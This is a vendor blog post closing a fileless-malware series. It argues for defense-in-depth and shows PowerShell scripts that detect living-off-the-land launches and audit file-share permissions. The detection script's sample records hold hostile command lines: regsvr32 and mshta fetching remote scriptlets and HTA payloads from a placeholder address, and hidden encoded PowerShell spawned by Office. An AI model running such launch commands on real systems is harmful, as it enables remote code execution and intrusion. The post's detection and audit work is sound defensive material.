Adventures in Fileless Malware: Closing Thoughts

Michael Buckbee
3 min read
Last updated January 17, 2023

I think we can all agree that hackers have a lot of tricks and techniques to sneak into your IT infrastructure and remain undetected while they steal the digital goodies. The key takeaway from this series is that signature-based detection of malware is easily nullified by even low-tech approaches, some of which I presented: no new binary ever touches disk, so there is nothing for a scanner to hash.

I’m very aware that prominent security researchers are now calling virus scanners useless, but don’t throw them out just yet! There’s still a lot of mint-condition legacy malware on the Intertoobz, reused by lazy hackers, that these scanners would block.


A better philosophy for dealing with fileless malware and stealthy post-exploitation techniques is to supplement the standard perimeter defenses, port scanners, and malware detectors with secondary lines of defense, and to have strategies in place for when the inevitable happens, including a breach response program.

I’m referring to, wait for it, defense-in-depth (DiD). This is a very practical approach to dealing with smart hackers who sneer at perimeter defenses, and mock signature scanning software.

Does DiD have its own problems? Sure. Those same security pros who have lost faith in traditional security measures are now promoting application whitelisting, which can be a very strong inner wall: even after an attacker gets a foothold, an executable that isn’t on the approved list won’t run.

But the code-free techniques I showed in this series can be used to get around even whitelisting. A whitelist decides which binary may run, not what a trusted binary is told to do, and regsvr32.exe, mshta.exe, PowerShell, and Office are all signed Microsoft software that any sane whitelist allows. This falls under a newer hacking trend called “living off the land”, which subverts legitimate tools and software for evil purposes. In the next few weeks, I’ll post a mini-tutorial on lol-ware. For those who want to do their homework ahead of time, start perusing this interesting github resource. Stay tuned.

Q: Can you get around Windows security protections by sneaking forbidden commands into regsvr32.exe? A: Yes, next question.
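That caption is exactly the gap a second line of defense has to cover: regsvr32.exe is allowed to run, so the telemetry has to look at what it was asked to run. The script below is an added example, not code from the original post or from Varonis, that checks process-creation records for the living-off-the-land patterns this series used. The records are constructed samples whose fields mirror Sysmon Event ID 1 (Image, CommandLine, ParentImage); the indicators (regsvr32 loading scrobj.dll or given a remote /i: URL, mshta with a URL or inline script, rundll32 with a javascript: handler, encoded or hidden PowerShell, and any script host spawned directly by an Office application) are publicly documented LOLBin tells, and the 203.0.113.10 address is a documentation-range placeholder.

```powershell
# Added example: detection logic for living-off-the-land launches, run over
# constructed sample records. Field names mirror Sysmon Event ID 1; in production
# replace $Samples with events from your Sysmon log or SIEM.

$Samples = @(
    [pscustomobject]@{   # Squiblydoo-style regsvr32 scriptlet, launched from a Word document
        Image       = 'C:\Windows\System32\regsvr32.exe'
        CommandLine = 'regsvr32.exe /s /n /u /i:http://203.0.113.10/update.sct scrobj.dll'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
    }
    [pscustomobject]@{   # legitimate DLL registration by an installer
        Image       = 'C:\Windows\System32\regsvr32.exe'
        CommandLine = 'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'
        ParentImage = 'C:\Windows\System32\msiexec.exe'
    }
    [pscustomobject]@{   # mshta pulling a remote HTA
        Image       = 'C:\Windows\System32\mshta.exe'
        CommandLine = 'mshta.exe http://203.0.113.10/payload.hta'
        ParentImage = 'C:\Windows\explorer.exe'
    }
    [pscustomobject]@{   # hidden, encoded PowerShell spawned by Excel (the DDE/VBA path)
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -nop -w hidden -enc SQBFAFgA'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
    }
    [pscustomobject]@{   # benign noise
        Image       = 'C:\Windows\System32\notepad.exe'
        CommandLine = 'notepad.exe C:\Users\alice\notes.txt'
        ParentImage = 'C:\Windows\explorer.exe'
    }
)

$OfficeParents = 'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe'
$ScriptHosts   = 'regsvr32.exe', 'mshta.exe', 'rundll32.exe', 'powershell.exe',
                 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe'

function Test-LolbinLaunch {
    # Emits a finding object for suspicious records and nothing for benign ones.
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)]$Record)
    process {
        $exe     = [System.IO.Path]::GetFileName($Record.Image).ToLowerInvariant()
        $parent  = [System.IO.Path]::GetFileName($Record.ParentImage).ToLowerInvariant()
        $cmd     = $Record.CommandLine
        $reasons = @()

        switch ($exe) {
            'regsvr32.exe' {
                # scrobj.dll or a remote /i: target turns regsvr32 into a scriptlet host.
                if ($cmd -imatch 'scrobj\.dll' -or $cmd -imatch '/i:\S*(https?|ftp)://') {
                    $reasons += 'regsvr32 scriptlet or remote /i:'
                }
            }
            'mshta.exe' {
                if ($cmd -imatch '(https?://|javascript:|vbscript:)') {
                    $reasons += 'mshta remote or inline script'
                }
            }
            'rundll32.exe' {
                if ($cmd -imatch 'javascript:') { $reasons += 'rundll32 javascript: handler' }
            }
            { $_ -in 'powershell.exe', 'pwsh.exe' } {
                if ($cmd -imatch '(-enc(odedcommand)?\s|-w(indowstyle)?\s+hidden)') {
                    $reasons += 'encoded or hidden PowerShell'
                }
            }
        }

        # A script host whose parent is an Office app is the fileless entry point from this series.
        if (($parent -in $OfficeParents) -and ($exe -in $ScriptHosts)) {
            $reasons += "spawned by Office ($parent)"
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Image       = $exe
                Parent      = $parent
                Reasons     = $reasons -join '; '
                CommandLine = $cmd
            }
        }
    }
}

$Samples | Test-LolbinLaunch | Format-Table -AutoSize -Wrap
```

Run as-is, the first, third, and fourth samples are reported (the regsvr32 and PowerShell ones with two reasons each) and the vendor DLL registration and notepad launch are not. The point of the parent-process check is that none of these binaries is suspicious on its own; the combination of a trusted host, an unusual argument, and an Office parent is what a signature scanner can never see and a process-telemetry rule sees immediately.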

Get Real About Data Security!

In my view, defense-in-depth is about minimizing liabilities: taking what could be a catastrophe and turning it into something survivable that doesn’t cost too much.

The hacker got in, but because of your company’s excellent and restrictive permission policies, you prevented her from gaining access to sensitive data.

Or the hackers have obtained access to the sensitive data, but your awesome user-behavior analytics technology has spotted the intruders and disabled the accounts before a million credit cards could be exfiltrated.

Or perhaps the hacker has managed to find and exfiltrate a file of email addresses. However, your outstanding breach response program, which includes near real-time information on abnormal file activity, lets you contact the appropriate regulators (and the affected customers) in near record time with detailed information on the incident, and thereby avoid fines and bad publicity.

Common Sense Defense Advice

Defense-in-depth is more of a mind-set and philosophy, but there are some practical steps to take and, ahem, great solutions available to make it easier to implement.

If I had to take the defense-in-depth approach and turn it into three actionable bullet points, here’s what I would say:

  • Assess. Evaluate your data risks by taking an inventory of what you need to protect. Identify PII and other sensitive data, some of which falls under regulations and which is often scattered across huge file systems. You need to work out who has access to it and who really should have access to it. Warning: this ain’t easy to do, unless you have some help.
  • Defend. Now that you’ve found the data, limit the potential damage of future breaches by locking it down: reduce broad and global access, and simplify permission structures – avoid one-off ACLs and use group objects. Minimize the overall potential risk by retiring stale data or other data that no longer serves its original function.
  • Sustain. Maintain a secure state by automating authorization workflows, entitlement reviews, and the retention and disposition of data. And finally, monitor for unusual user and system behaviors.
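To make the Assess and Defend bullets concrete, here is an added example (not the original post’s code and not a Varonis tool) that does a first pass over a Windows file share: it flags every Allow ACE granted to a broad principal (Everyone, Authenticated Users, BUILTIN\Users, Domain Users) and every non-inherited ACE below the share root, which is where one-off permissions accumulate, then lists files nobody has written to in years as retirement candidates for the Sustain step. The share path, the three-year threshold, and the output directory are placeholders; the SIDs are the standard well-known ones.

```powershell
# Added example: a first "Assess" pass over a file share. Assumptions: $Root is a
# placeholder share path you can read, and "stale" means no write in $StaleYears years.
param(
    [string]$Root       = '\\fileserver\finance',
    [int]   $StaleYears = 3,
    [string]$OutDir     = '.'
)

# Broad principals that should rarely hold rights on a sensitive folder.
$BroadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
}

function Test-BroadPrincipal {
    param([System.Security.Principal.IdentityReference]$Identity)
    try {
        $sid = $Identity.Translate([System.Security.Principal.SecurityIdentifier]).Value
    } catch {
        return $false   # orphaned or untranslatable SID: worth its own report, not a broad grant
    }
    # "Domain Users" has RID 513 in every domain, so the prefix varies but the tail does not.
    return $BroadSids.ContainsKey($sid) -or $sid.EndsWith('-513')
}

# Walk every folder and inspect each Allow ACE.
$findings = foreach ($dir in Get-ChildItem -LiteralPath $Root -Directory -Recurse -ErrorAction SilentlyContinue) {
    $acl = Get-Acl -LiteralPath $dir.FullName -ErrorAction SilentlyContinue
    if (-not $acl) { continue }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $reasons = @()
        if (Test-BroadPrincipal $ace.IdentityReference) { $reasons += 'broad-principal' }
        # A non-inherited ACE below the root is a one-off: someone hand-edited this folder
        # instead of managing access through a group on the parent.
        if (-not $ace.IsInherited) { $reasons += 'explicit-ace' }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Path     = $dir.FullName
                Identity = $ace.IdentityReference.Value
                Rights   = $ace.FileSystemRights
                Reasons  = $reasons -join ','
            }
        }
    }
}
$findings | Export-Csv -LiteralPath (Join-Path $OutDir 'acl-findings.csv') -NoTypeInformation
$findings | Sort-Object Path | Format-Table -AutoSize

# Stale data candidates: files untouched for $StaleYears years (retire, archive, or justify).
$cutoff = (Get-Date).AddYears(-$StaleYears)
Get-ChildItem -LiteralPath $Root -File -Recurse -ErrorAction SilentlyContinue |
    Where-Object { $_.LastWriteTime -lt $cutoff } |
    Select-Object FullName, LastWriteTime, Length |
    Export-Csv -LiteralPath (Join-Path $OutDir 'stale-files.csv') -NoTypeInformation
```

Run it from an account that can read the tree but does not need to change anything; the script only reports. The Defend step is then the manual part: for each explicit-ace row, replace the user-level grant with membership in a group that already holds an inherited ACE on the parent, and for each broad-principal row decide whether the folder really needs to be readable by the whole company. Re-running the script after cleanup, and on a schedule afterwards, is the cheapest version of the Sustain bullet.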

Need to make your defense in depth dream a reality? Learn how we can help.

